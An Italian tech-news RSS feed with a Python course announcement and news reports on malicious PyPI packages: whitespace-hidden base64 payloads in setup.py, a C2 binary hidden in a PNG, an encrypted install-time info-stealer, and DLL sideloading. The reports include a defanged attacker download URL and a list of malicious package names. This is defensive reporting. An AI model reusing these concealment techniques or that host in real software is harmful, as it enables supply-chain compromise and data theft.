<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>python Archivi - Webbare</title>
	<atom:link href="https://www.webbare.it/tag/python/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.webbare.it/tag/python/</link>
	<description>Easy choise, easy way!</description>
	<lastBuildDate>Mon, 30 Sep 2024 13:09:40 +0000</lastBuildDate>
	<language>it-IT</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1</generator>

<image>
	<url>https://www.webbare.it/wp-content/uploads/2020/02/jira-logo-scaled.png</url>
	<title>python Archivi - Webbare</title>
	<link>https://www.webbare.it/tag/python/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Corso Python per Principianti: Su Pills for Nerd Parte un Nuovo Percorso di Programmazione</title>
		<link>https://www.webbare.it/2024-09-pills-for-nerd-python/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=pills-for-nerd-python</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 30 Sep 2024 13:09:40 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[pills for nerds]]></category>
		<category><![CDATA[python]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2509</guid>

					<description><![CDATA[<p>I dispositivi Pixel supportati riceveranno l'aggiornamento nelle prossime settimane</p>
<p>L'articolo <a href="https://www.webbare.it/2024-09-pills-for-nerd-python/">Corso Python per Principianti: Su Pills for Nerd Parte un Nuovo Percorso di Programmazione</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396ed7f35" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396ed7edc5806"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396edd114869" ><div class="vc_column-inner thegem-custom-inner-6aaf396edd11a "><div class="wpb_wrapper thegem-custom-6aaf396edd114869">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396edd9043374"  >
			<div class="wpb_wrapper">
				<div class="wp-block-ultimate-post-post-content ultp-block-c20613 small-body">
<p>Su <strong>Pills for Nerd</strong>, una delle piattaforme di riferimento per appassionati di tecnologia e programmazione, sta per iniziare un nuovo <strong>corso per principianti di Python</strong>. Il corso è pensato per chi si avvicina per la prima volta a questo linguaggio di programmazione, oggi tra i più richiesti nel mondo del lavoro grazie alla sua versatilità e facilità d&#8217;uso.</p>
<p>Durante il percorso, gli studenti impareranno le basi di Python, dalla sintassi fondamentale alla gestione di variabili, cicli, funzioni e moduli. Ideale per chi vuole avviare la propria carriera nella programmazione o per appassionati in cerca di nuove competenze, il corso offre un approccio pratico e accessibile a tutti.</p>
<p>Fonte: <a href="https://pillsfornerds.com/python-in-pillole-senza-paura-setup-dellambiente-di-sviluppo/">Pills For Nerds</a></p>
</div>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396edd9043374{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396edd9043374{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396edd9043374{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396edd9043374{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-09-pills-for-nerd-python/">Corso Python per Principianti: Su Pills for Nerd Parte un Nuovo Percorso di Programmazione</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Sonatype espone il pacchetto PyPI dannoso &#8220;pytoileur&#8221;</title>
		<link>https://www.webbare.it/2024-05-sonatype-pypi/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=sonatype-pypi</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 29 May 2024 15:35:51 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[Devops]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[package]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2427</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-05-sonatype-pypi/">Sonatype espone il pacchetto PyPI dannoso &#8220;pytoileur&#8221;</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396ede62a" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396ede6195481"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396ede8717788" ><div class="vc_column-inner thegem-custom-inner-6aaf396ede874 "><div class="wpb_wrapper thegem-custom-6aaf396ede8717788">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396edea213987"  >
			<div class="wpb_wrapper">
				<p><strong>Sonatype</strong> ha scoperto “<em>pytoileur</em>”, un pacchetto <strong>PyPI</strong> dannoso progettato per scaricare e installare binari Windows troianizzati in grado di sorvegliare, requisire la persistenza e rubare criptovalute. Questa scoperta fa parte di una campagna più ampia, durata mesi, denominata “Cool package”, volta a infiltrarsi nella comunità dei codificatori.</p>
<p>Ieri, un sistema di rilevamento automatico di malware gestito da Sonatype, noto come Sonatype Repository Firewall, ha segnalato un pacchetto PyPI appena pubblicato chiamato “pytoileur”. Il pacchetto dannoso, rintracciato come sonatype-2024-1783, aveva registrato 264 download dal suo rilascio prima che Sonatype avvertisse gli amministratori di PyPI di rimuoverlo.</p>
<p>Il pacchetto si descriveva come “pacchetto cool”, con una descrizione <strong>HTML</strong> che affermava che si trattava di “uno strumento di gestione delle API scritto in Python”. È interessante notare che includeva un riferimento a “pystob”, un pacchetto ormai defunto, indicando un tentativo di typosquatting per ingannare gli utenti di pacchetti legittimi come “Pyston”.</p>
<p>A prima vista, il file “setup.py” all&#8217;interno di “pytoileur” sembrava pulito, ma Jeff Thornhill, ricercatore di sicurezza di Sonatype, ha scoperto del codice maligno abilmente nascosto con spazi bianchi eccessivi.</p>
<p>“Sebbene la codifica base64 sia piuttosto standard nelle applicazioni e non offra molto in termini di mascheramento del codice dannoso, l&#8217;autore ha tentato di ‘nascondere’ questa particolare stringa codificata alla revisione umana manuale iniettandola dopo un&#8217;istruzione di stampa e includendo un paragrafo di spazi bianchi prima del codice”, ha spiegato Thornhill.</p>
<p>Il payload codificato in base64 è stato progettato per colpire gli utenti di Windows. Utilizzava comandi Python per scaricare un eseguibile dannoso da un server esterno (hxxp://51.77.140[.]144:8086/dl/runtime). Il binario dannoso, “Runtime.exe”, viene eseguito utilizzando comandi Windows PowerShell e VBScript. Questo eseguibile impiega misure anti-rilevamento per evitare i controlli e installa spyware aggiuntivi in grado di persistere, tra cui funzionalità di furto di informazioni e crypto-jacking.</p>
<p>Ax Sharma, ricercatore di Sonatype, ha scoperto che l&#8217;attore delle minacce dietro il pacchetto PyPI dannoso “pytoileur” sta pubblicando risposte false su StackOverflow, invitando le persone a installare il pacchetto dannoso.</p>
<p><iframe id="twitter-widget-0" class="" style="position: static; visibility: visible; width: 550px; height: 672px; display: block; flex-grow: 1;" title="X Post" src="https://platform.twitter.com/embed/Tweet.html?creatorScreenName=Gadget_Ry&amp;dnt=true&amp;embedId=twitter-widget-0&amp;features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOltdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2ZvbGxvd2VyX2NvdW50X3N1bnNldCI6eyJidWNrZXQiOnRydWUsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9iYWNrZW5kIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19yZWZzcmNfc2Vzc2lvbiI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfZm9zbnJfc29mdF9pbnRlcnZlbnRpb25zX2VuYWJsZWQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X21peGVkX21lZGlhXzE1ODk3Ijp7ImJ1Y2tldCI6InRyZWF0bWVudCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3Nob3dfYmlyZHdhdGNoX3Bpdm90c19lbmFibGVkIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19kdXBsaWNhdGVfc2NyaWJlc190b19zZXR0aW5ncyI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdXNlX3Byb2ZpbGVfaW1hZ2Vfc2hhcGVfZW5hYmxlZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdmlkZW9faGxzX2R5bmFtaWNfbWFuaWZlc3RzXzE1MDgyIjp7ImJ1Y2tldCI6InRydWVfYml0cmF0ZSIsInZlcnNpb24iOm51bGx9LCJ0ZndfbGVnYWN5X3RpbWVsaW5lX3N1bnNldCI6eyJidWNrZXQiOnRydWUsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9mcm9udGVuZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9fQ%3D%3D&amp;frame=false&amp;hideCard=false&amp;hideThread=false&amp;id=1795813203500322953&amp;lang=en-gb&amp;origin=https%3A%2F%2Fwww.developer-tech.com%2Fnews%2F2024%2Fmay%2F29%2Fsonatype-exposes-malicious-pypi-package-pytoileur%2F&amp;sessionId=7d4cde34bbb9fe0f4e5dafcf600819b8f4576b04&amp;siteScreenName=Developer_Tech&amp;theme=light&amp;widgetsVersion=2615f7e52b7e0%3A1702314776716&amp;width=550px" frameborder="0" scrolling="no" allowfullscreen="allowfullscreen" data-tweet-id="1795813203500322953"></iframe></p>
<p>Questa preoccupazione è amplificata dalla grande presenza di sviluppatori alle prime armi su StackOverflow, che stanno ancora imparando e potrebbero essere vittime di consigli dannosi.</p>
<p>Ulteriori indagini hanno rivelato che “pytoileur” fa parte di una campagna più ampia legata a pacchetti dannosi identificati in precedenza. Questi pacchetti, spesso descritti semplicemente come “Cool package”, hanno utilizzato tecniche di inganno simili dal 2023. Si camuffano da strumenti di gestione delle API o da versioni semplificate di utility ben note, prendendo di mira gli sviluppatori di varie nicchie, tra cui l&#8217;intelligenza artificiale e l&#8217;apprendimento automatico.</p>
<p>Uno dei pacchetti precedenti, “gpt-requests”, che sembrava rivolto agli sviluppatori di IA, nascondeva anche i payload dannosi utilizzando gli spazi bianchi. Simili a “pytoileur”, questi payload scaricano binari troianizzati destinati allo spionaggio e al furto di dati.</p>
<p>Il pacchetto “lalalaopti” è particolarmente degno di nota perché conteneva moduli di codice Python in chiaro per il dirottamento degli appunti, il keylogging, l&#8217;accesso remoto alla webcam e la cattura degli screenshot, evidenziando ulteriormente l&#8217;intento malevolo degli attori delle minacce dietro questa campagna.</p>
<p>I ricercatori di Sonatype e Checkmarx hanno identificato diversi pacchetti dannosi collegati a questa campagna, tra cui:</p>
<ul>
<li>gogogolokl</li>
<li>gpt-richieste</li>
<li>kokokoako</li>
<li>lalalaopti</li>
<li>pybowl</li>
<li>pyclack</li>
<li>pyefflorer</li>
<li>pyhjdddo</li>
<li>pyhulul</li>
<li>piioapso</li>
<li>pyjio</li>
<li>pyjoul</li>
<li>pykokalalz</li>
<li>pykooler</li>
<li>pyktrkatoo</li>
<li>pilone</li>
<li>piminor</li>
<li>piowler</li>
<li>pipiele</li>
<li>pystallerer</li>
<li>pistob</li>
<li>pytarlooko</li>
<li>pytasler</li>
<li>pitoileur</li>
<li>pywolle</li>
<li>pywool</li>
</ul>
<p>La ricomparsa della campagna “Cool package” attraverso “pytoileur” dimostra la persistenza delle minacce poste da attori malintenzionati negli ambienti di sviluppo software. In presenza di minacce simili, Sonatype dichiara che continuerà a espandere le proprie blocklist e a salvaguardare la comunità degli sviluppatori.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396edea213987{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396edea213987{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396edea213987{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396edea213987{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-05-sonatype-pypi/">Sonatype espone il pacchetto PyPI dannoso &#8220;pytoileur&#8221;</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Phylum scopre un malware mirato camuffato in un pacchetto Python</title>
		<link>https://www.webbare.it/2024-05-phylum-malware-python/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=phylum-malware-python</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 22 May 2024 11:58:05 +0000</pubDate>
				<category><![CDATA[Mobile App]]></category>
		<category><![CDATA[Mobile Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[development]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Phylum]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2421</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-05-phylum-malware-python/">Phylum scopre un malware mirato camuffato in un pacchetto Python</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396edf480" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396edf4705592"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396edf69a4490" ><div class="vc_column-inner thegem-custom-inner-6aaf396edf69d "><div class="wpb_wrapper thegem-custom-6aaf396edf69a4490">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396edf8229772"  >
			<div class="wpb_wrapper">
				<p>Gli esperti di cybersicurezza di <strong>Phylum</strong> hanno individuato un payload dannoso incorporato in un popolare pacchetto Python sul repository <strong>PyPI</strong>. Il pacchetto, denominato requests-darwin-lite, è una variante non autorizzata della libreria requests, ampiamente utilizzata.</p>
<p>Il pacchetto<em> requests-darwin-lite</em> è stato abilmente progettato per emulare la sua controparte legittima, ma includeva un binario Go nascosto in un file immagine sovradimensionato che fingeva di essere un semplice logo. Questo file &#8211; un PNG etichettato come immagine della barra laterale &#8211; pesava insolitamente circa 17 MB, in netto contrasto con le dimensioni normali di circa 300 kB della versione autentica.</p>
<p>Durante l&#8217;installazione del pacchetto, se l&#8217;ambiente di installazione era <strong>macOS</strong>, veniva attivata una classe di comando specializzata &#8220;PyInstall&#8221;. Questa classe esegue un comando codificato in base64 che estrae l&#8217;UUID (Universal Unique Identifier) del sistema.</p>
<p>Il codice verificava la presenza di un UUID specifico, indicando un attacco altamente mirato. Se l&#8217;UUID non corrispondeva, l&#8217;installazione proseguiva senza distribuire il malware. Ciò suggerisce che gli aggressori stavano testando la distribuzione o avevano in mente un obiettivo molto specifico.</p>
<p>Quando le condizioni erano soddisfatte, il file PNG sovradimensionato veniva elaborato per estrarre il binario nascosto, che veniva poi reso eseguibile ed eseguito in background, dando di fatto agli aggressori il controllo del computer. L&#8217;analisi dei file ha identificato il binario come un componente di OSX/Silver, un framework C2 (comando e controllo) simile a Cobalt Strike, ma meno conosciuto e quindi con minori probabilità di essere rilevato.</p>
<p>Phylum ha notato che le versioni precedenti di questo pacchetto includevano il gancio di installazione dannoso e il binario impacchettato. Tuttavia, le versioni successive &#8211; identificate come 2.28.0 e 2.28.1 &#8211; hanno ridotto queste caratteristiche aggressive; la prima non esegue più il binario al momento dell&#8217;installazione e la seconda è del tutto priva dei componenti dannosi.</p>
<p>La scoperta ha provocato una segnalazione immediata a PyPI, che ha portato alla rimozione di tutte le versioni del pacchetto dal repository. Questa sequenza di eventi sottolinea la necessità di vigilare nella comunità open-source, dove la confusione delle dipendenze e gli attacchi mirati stanno diventando sempre più sofisticati.</p>
<p>Questo incidente ci ricorda che gli aggressori continuano ad evolvere i loro metodi per sfruttare gli ecosistemi open-source, sfruttando pacchetti apparentemente innocenti per distribuire malware. È necessario aumentare la consapevolezza e le misure preventive in tutta la comunità tecnologica per salvaguardarsi da questi attacchi.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396edf8229772{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396edf8229772{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396edf8229772{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396edf8229772{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-05-phylum-malware-python/">Phylum scopre un malware mirato camuffato in un pacchetto Python</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>PyPI sospende le registrazioni a causa di un attacco di malware</title>
		<link>https://www.webbare.it/2024-04-pypi-malware-registrazioni-sospese/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=pypi-malware-registrazioni-sospese</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 03 Apr 2024 08:18:31 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[python package index]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[typosquatting]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2391</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-04-pypi-malware-registrazioni-sospese/">PyPI sospende le registrazioni a causa di un attacco di malware</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396ee0007" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396edfffb561"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396ee01b93808" ><div class="vc_column-inner thegem-custom-inner-6aaf396ee01ba "><div class="wpb_wrapper thegem-custom-6aaf396ee01b93808">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396ee033c7244"  >
			<div class="wpb_wrapper">
				<p>Il <a href="https://pypi.org/">Python Package Index</a> (PyPI) ha sospeso la creazione di nuovi progetti e la registrazione degli utenti per mitigare una campagna di upload di malware in corso. Questa mossa arriva dopo che i ricercatori di sicurezza di Checkmarx <a href="https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended">hanno scoperto</a> una campagna che coinvolge più pacchetti dannosi legati agli stessi attori della minaccia.</p>
<p>Gli aggressori stanno prendendo di mira le vittime attraverso attacchi di typosquatting, inducendo gli utenti a installare pacchetti Python dannosi attraverso la loro interfaccia a riga di comando. Questo attacco in più fasi mira a rubare portafogli di criptovalute, dati sensibili del browser come cookie e dati delle estensioni e varie credenziali.</p>
<p>Il payload dannoso impiega anche un meccanismo di persistenza per sopravvivere ai riavvii del sistema, garantendo l&#8217;accesso continuo alle macchine compromesse.</p>
<h4>Pacchetti maligni di typosquatting</h4>
<p>Tra il 27 e il 28 marzo 2024, diversi pacchetti Python dannosi sono stati caricati su PyPI, probabilmente utilizzando strumenti di automazione. Questi pacchetti contenevano codice maligno all&#8217;interno dei loro file setup.py, consentendo l&#8217;esecuzione automatica al momento dell&#8217;installazione.</p>
<p>I file setup.py contenevano codice offuscato e crittografato utilizzando il modulo di crittografia Fernet. Al momento dell&#8217;installazione, questo codice veniva eseguito, innescando il recupero di un payload aggiuntivo da un server remoto. L&#8217;URL del payload è stato costruito dinamicamente aggiungendo il nome del pacchetto come parametro di query.</p>
<p>Una volta decriptato, il payload recuperato ha rivelato un ampio info-stealer progettato per raccogliere informazioni sensibili dal computer della vittima, tra cui portafogli di criptovalute, dati del browser e credenziali.</p>
<p>In risposta alla campagna di malware, PyPI ha temporaneamente sospeso la creazione di nuovi progetti e la registrazione di nuovi utenti. Questa misura mira a mitigare la minaccia in corso mentre l&#8217;organizzazione indaga e affronta il problema.</p>
<p>L&#8217;<em>elenco completo dei pacchetti scoperti da Checkmarx è </em> disponibile <a href="https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/"><em>qui</em></a><em>.</em></p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee033c7244{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee033c7244{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee033c7244{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee033c7244{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-04-pypi-malware-registrazioni-sospese/">PyPI sospende le registrazioni a causa di un attacco di malware</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Scoperti alcuni Pacchetti Python che utilizzavano il sideloading DLL per aggirare la sicurezza</title>
		<link>https://www.webbare.it/2024-02-python-dll/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=python-dll</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 21 Feb 2024 14:12:49 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[development]]></category>
		<category><![CDATA[dll sideloading]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[open source]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[reversinglabs]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2340</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-02-python-dll/">Scoperti alcuni Pacchetti Python che utilizzavano il sideloading DLL per aggirare la sicurezza</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396ee0bb5" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396ee0ba41352"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396ee0da32418" ><div class="vc_column-inner thegem-custom-inner-6aaf396ee0da6 "><div class="wpb_wrapper thegem-custom-6aaf396ee0da32418">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396ee0f3f8631"  >
			<div class="wpb_wrapper">
				<p>I ricercatori di <em>ReversingLabs</em> hanno scoperto dei pacchetti <strong>Python</strong> che utilizzano il sideloading di DLL per aggirare gli strumenti di sicurezza.</p>
<p>Il <strong>10 gennaio 2024, Karlo Zanki,</strong> un reverse engineer di ReversingLabs, si è imbattuto in due pacchetti sospetti sul Python Package Index (PyPI). Questi pacchetti, denominati NP6HelperHttptest e NP6HelperHttper, sono risultati utilizzare il sideloading di DLL, una tecnica nota utilizzata da attori malintenzionati per eseguire codice in modo discreto ed eludere il rilevamento da parte degli strumenti di sicurezza.</p>
<p>Questa scoperta sottolinea l&#8217;espansione del panorama delle minacce all&#8217;interno delle catene di fornitura del software, con attori malintenzionati che sfruttano le vulnerabilità negli ecosistemi open-source. L&#8217;incidente evidenzia le sfide che gli sviluppatori devono affrontare per verificare la qualità e l&#8217;autenticità dei moduli open-source, in un panorama vasto e in continua evoluzione di codice disponibile.</p>
<p>I pacchetti dannosi, <strong>camuffati</strong> con nomi molto simili a quelli legittimi, miravano a ingannare gli sviluppatori e a farli incorporare inconsapevolmente nei loro progetti. Questa tattica, nota come typosquatting, è solo uno dei tanti metodi utilizzati dagli aggressori per infiltrarsi nelle catene di fornitura del software legittimo.</p>
<p>Ulteriori indagini hanno rivelato che i pacchetti dannosi hanno preso di mira i pacchetti PyPI esistenti, NP6HelperHttp e NP6HelperConfig, originariamente pubblicati da un utente chiamato NP6. Mentre NP6 è associato a <a href="https://www.chapsvision.com/">Chapvision</a>, un&#8217;azienda di automazione del marketing, l&#8217;account PyPI in questione era collegato a un account personale di uno sviluppatore di Chapvision. La scoperta ha spinto Chapvision a confermare la legittimità degli strumenti di aiuto e a rimuovere successivamente i pacchetti dannosi da <strong>PyPI.</strong></p>
<p>L&#8217;analisi dei pacchetti dannosi ha rivelato un approccio sofisticato, in cui uno script <strong>setup.py</strong> è stato utilizzato per scaricare sia i file legittimi che quelli dannosi. In particolare, la DLL dannosa &#8211; dgdeskband64.dll &#8211; è stata creata per sfruttare il sideloading delle DLL, una tecnica comunemente utilizzata dai criminali informatici per caricare codice dannoso eludendo il rilevamento.</p>
<p>Un ulteriore esame ha rivelato una campagna più ampia, con altri campioni che presentano caratteristiche simili. La piattaforma Titanium di ReversingLabs, utilizzando YARA Retro Hunt, ha identificato campioni correlati che indicano uno sforzo coordinato da parte degli attori delle minacce.</p>
<p>Il codice dannoso, incorporato nella DLL, utilizzava un gestore di eccezioni per eseguire shellcode, stabilendo una connessione con un server esterno per scaricare ed eseguire payload. L&#8217;indagine ha inoltre portato alla luce tracce di Cobalt Strike Beacon, uno strumento di sicurezza del Red Team riutilizzato dagli attori delle minacce per attività dannose.</p>
<p>Questa scoperta sottolinea la crescente sofisticazione degli attori maligni che sfruttano le infrastrutture open-source per le loro campagne. Evidenzia l&#8217;urgente necessità per gli sviluppatori e le organizzazioni di fortificare le loro catene di fornitura del software contro tali attacchi, sottolineando le misure proattive per garantire l&#8217;integrità e la sicurezza dei loro repository di codice.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee0f3f8631{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee0f3f8631{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee0f3f8631{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee0f3f8631{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-02-python-dll/">Scoperti alcuni Pacchetti Python che utilizzavano il sideloading DLL per aggirare la sicurezza</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Google aggiunge i simulatori iOS e Android al Progetto IDX</title>
		<link>https://www.webbare.it/2024-01-google-ios-android-idx/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=google-ios-android-idx</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 31 Jan 2024 13:15:50 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[Devops]]></category>
		<category><![CDATA[Mobile App]]></category>
		<category><![CDATA[Mobile Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[astro]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[cloud workspace]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[development]]></category>
		<category><![CDATA[emulator]]></category>
		<category><![CDATA[flask qwik]]></category>
		<category><![CDATA[flutter]]></category>
		<category><![CDATA[go]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[iOs]]></category>
		<category><![CDATA[lit]]></category>
		<category><![CDATA[node.js]]></category>
		<category><![CDATA[preact]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[project idx]]></category>
